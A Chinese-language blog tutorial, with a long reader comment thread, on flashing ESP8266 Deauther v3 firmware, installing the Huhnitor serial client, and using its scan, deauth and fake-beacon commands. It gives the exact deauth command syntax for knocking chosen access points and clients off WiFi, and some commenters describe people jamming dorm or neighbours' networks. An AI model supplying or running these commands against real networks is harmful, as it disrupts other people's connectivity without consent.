前言:本文内容仅供学习、参考,禁止任何违法的网络攻击行为。人皆有情,国法无情!
近几年ESP8266的Deauther v2被极客们玩的不亦乐乎,最近SpacehuhnTech更新出了Deauther的v3版本。
据官网给的信息,v3版本取消了AP和网页控制功能,使用串口命令行控制,功能更多,稳定性更强,可定制化程度更高。
而且还推出了v3的专用连接工具Huhnitor,其他任意支持波特率115200的串口工具也能够使用

现在我们开始入手Deauther v3吧!
所需工具:#ESP8266模块x1,#电脑一台,
演示环境:#Windows 10 x64 专业版,#Ubuntu server 20.10 x64
0x01 烧录:
最常见的ESP8266模块TTL芯片是CP210x和CH34x,CP210x驱动下载CH34x驱动下载(看不懂英文没关系,这些驱动都烂大街了,随便百度下就能找到资源,但是有些可能会带病毒)
烧录我们使用乐鑫官方的烧录工具flash_download_tool_v3.8.5_1.zip
v3固件下载地址:github官方下载fastgit.org镜像站下载
将模块连接到电脑,安装好驱动后重启电脑,解压烧录工具,运行文件夹内的flash_download_tool_v3.8.5.exe。再弹出界面选择Developer Mode>>ESP8266 DownloadTool


选择固件和烧录地址,选择串口,波特率推荐115200,我这里是COM4,如果只有COM1的请检查数据线或者驱动是否装好。参考下图

然后将ESP8266进入烧录模式,START开始烧录,这样就是烧录完成了
0x02 客户端安装:
#Windows客户端:
关闭烧录工具,重启模块,打开Huhnitor(其他串口软件也可以)。Huhnitor下载:github官网fastgit.org镜像站(win10防火墙可能会拦截运行,忽略即可)
运行截图
#linux客户端(root用户,非root用户请在头部加上sudo)
打开终端输入
wget https://download.fastgit.org/SpacehuhnTech/Huhnitor/releases/download/1.1.2/huhnitor_1.1.2_linux//下载二进制文件,这里我是从镜像站下载的
chmod +x huhnitor_1.1.2_linux //赋予可执行权限
ln -s /root/huhnitor_1.1.2_linux /usr/bin/huhnitor //创建软链接,方便使用。非root用户请把/root改成/home/用户名![]()
终端输入huhnitor启动客户端
0x03 使用:
输入串口所对应的数字,回车
windows

重启模块看有无输出STARTED

如图就是连接并启动成功了
输入help获取命令帮助(太长就不上图了)
扫描:
scan -m 模式 -t 客户端扫描时间 -ch 信道 -ct 信道扫描时间 -r 保存以前的扫描结果 scan [-m/ode <ap+st>] [-t/ime <20s>] [-ch/annel <all>] [-ct/ime <284>] [-r/etain] Scan for WiFi devices -m: scan mode [ap,st,ap+st] (default=ap+st) //默认扫描模式AP+客户端 -t: station scan time (default=20s) //默认客户端扫描时间20s -ch: 2.4 GHz channels for station scan [1-14] (default=all) //默认扫描所有信道 -ct: channel scan time in milliseconds (default=284) -r: keep previous scan results
默认扫描 :scan
扫描全部信道AP:scan -m ap

扫描指定信道AP+客户端:scan -ch 信道

Deauth攻击:
deauth -ap 目标AP编号 -st 目标客户端编号 -mac 手动选择目标(mac地址) -t 攻击时间 -n 数据包限制 -r 每秒数据包 -m 类型 deauth [-ap <value>] [-st/ation <value>] [-mac,manual <value>] [-t/ime/out <5min>] [-n/um/ber <0>] [-r/ate <20>] [-m/ode <deauth+disassoc>] Deauthenticate (disconnect) selected WiFi connections -ap: access point IDs to attack -st: station IDs to attack -mac: manual target selection [Sender-Receiver-Channel] for example:'aa:bb:cc:dd:ee:ff-00:11:22:33:44:55-7' -t: attack timeout (default=5min) -n: packet limit [>1] (default=0) -r: packets per second (default=20) -m: packet types [deauth,disassoc,deauth+disassoc] (default=deauth+disassoc) 攻击指定AP1分钟:deauth -ap IDs -t 1min

攻击指定客户端:deauth -st IDs

停止攻击:stop deauth

Beacon伪造AP:
beacon -ssid 名称 -bssid mac地址 -receiver 接收地址 -enc 加密方式 -ch 信道 -r 每秒数据包 -auth 扫描认证 -save 保存 -t 时间
beacon -ssid/s <value> [-bssid,from <random>] [-receiver,to <broadcast>] [-enc/ryption <open>] [-ch/annel <1>] [-r/ate <10>] [-auth,m/on/itor] [-save] [-t/ime/out <5min>] Send WiFi network advertisement beacons -ssid: network names (SSIDs) for example: "test A","test B" -from: BSSID or sender MAC address (default=random) -to: receiver MAC address (default=broadcast) -enc: encryption [open,wpa2] (default=open) -ch: 2.4 GHz channel(s) [1-14] (default=1) -r: packets per second per SSID (default=10) -m: scan for authentications -save: save probe requests from auth. scan -t: attack timeout (default=5min)
伪造一个AP:beacon -ssid 名字

start引导模式(新手推荐):
输入start进入引导模式,输入你想要发动的攻击,回车

例如

其他更有趣的功能我就不一一列举了,靠大家自己去探索了。我会尽力改出来一个汉化版的v3,供英语不太好的朋友们使用。
相关链接(镜像站):
https://hub.fastgit.org/SpacehuhnTech/esp8266_deauther
https://hub.fastgit.org/SpacehuhnTech/esp8266_deauther/tree/v3

澳大利亚 1F
这版功能更全,玩起来顺手。
印度尼西亚 2F
v3确实更稳,掉线几乎看不见。
韩国 3F
串口控制省事儿。
湖北省襄阳市襄州区 4F
M1 Mac上需要装驱动吗?
湖南省株洲市 5F
驱动页面广告多得要命。
湖北省武汉市 6F
有人在宿舍玩,宿管直接来了。
日本 7F
换根线后COM口立马识别,真是玄学。
越南 8F
Huhnitor在linux下记得加sudo,否则会报权限错误。
广东省 9F
scan命令的默认参数真的适合大多数环境吗?
湖北省襄阳市 10F
我也遇到过COM口不显示,换根线后识别立马好了,省了不少时间。
湖北省武汉市 11F
取消网页控制是对安全的负责,防止随手被滥用。
北京市 12F
前几天刚刷完v3,最头疼的就是找对COM口。COM4根本不出现,换了三根线才连上,调好后波特率115200最稳,后面几次升级都没再掉线,体验明显提升。
湖北省武汉市 13F
建议先用官方GitHub的链接下载固件和驱动,避免第三方站点的广告和潜在病毒,下载速度也更快,省去后期排查的麻烦。
北京市 14F
v3取消网页控制虽然有点不习惯,但串口命令更稳,真的省事儿。
日本 15F
顺带一提,Huhnitor在linux下需要加上sudo才能正常打开,否则会报权限错误。
北京市 16F
这个deauth攻击在5GHz频段能用吗?
澳大利亚 17F
说驱动会带病毒其实夸大其词,只要去官方站下载,基本安全。
辽宁省沈阳市 18F
我前几天刚把ESP8266刷成v3,最头疼的就是找对COM口。一开始COM4根本不显示,换了几根线才成功,调好后就顺畅了,真是一次小小的折腾。
上海市 19F
驱动下载页广告太多,点开眼都花了。
江苏省常州市 20F
看到有人把这玩意儿用来干扰邻居WiFi,真是无语 🤔。
北京市 21F
整体说明挺清晰。
广东省 22F
如果想把攻击时间设为30秒,命令里该怎么写才行?
香港 23F
我试了下用115200波特率连别的串口工具也行,挺方便的。
四川省南充市 24F
是不是说v3取消了AP控制,只能命令行操作了?
广东省中山市 25F
之前v2老掉线,v3稳多了。
广东省佛山市 26F
这些镜像站下载速度咋样,会不会很慢?
广东省广州市越秀区 27F
在Ubuntu下跑huhnitor,权限问题折腾了半天。
吉林省长春市 28F
伪造AP那个功能有点意思,可以搞点小测试。
台湾省新北市 29F
感觉v3更偏向专业玩家了,新手可能有点懵。
广东省湛江市 30F
驱动真的坑,下到过带广告软件的,烦死了。
中国 31F
攻击时间默认5分钟够用吗?
浙江省 32F
要是比特币跌回3万他们还能撑住不?
北京市 33F
串口命令行控制确实比网页版稳定多了。
菲律宾 34F
这工具在M1芯片的Mac上能用吗?
福建省泉州市 35F
之前用v2经常断连,v3基本没这问题。
福建省泉州市 36F
伪造AP功能可以测试网络安全性。
河北省 37F
驱动下载确实要小心,上次差点中招。
河南省周口市 38F
扫描命令的默认参数设置合理。
北京市 39F
新手用start引导模式挺友好的。
江苏省常州市 40F
攻击时间设成30秒是不是用-t 30s?
新疆哈密市 41F
linux下权限问题确实烦,加sudo就搞定了。
安徽省淮北市 42F
这个版本更适合有经验的玩家。
安徽省 43F
这版真稳,没掉线。
上海市浦东新区 44F
串口控制比网页省事儿,操作起来顺手。
江苏省苏州市 45F
驱动最好去官方GitHub,别被广告套。
日本 46F
在Mac M1上用Huhnitor需要额外的驱动吗?
日本 47F
别说全是坑,还是有不少实用点。
广东省中山市 48F
前几天刚刷完v3,COM口一直找不到,换了根线才连上,折腾了好久。
河南省信阳市 49F
这图占位真是看着尴尬。
北京市 B1
@ 锁头 确实占位图让人以为内容缺失,等正式图再来看看。
上海市静安区 50F
有人把Deauther当成玩具在宿舍搞WiFi干扰,结果被宿管抓了,现场一片混乱,真是自作自受 🤦♂️。
天津市 51F
看到有人在公共场合随意攻击,安全意识真的太薄弱了。
山东省滨州市 52F
整体说明够详细。
中国 53F
串口直接下指令,感觉比网页稳多了。
北京市 54F
驱动下载页广告真是眼睛的考验。
越南 B1
@ 诗礼传家 广告太多会误导新手,最好直接去官方页面。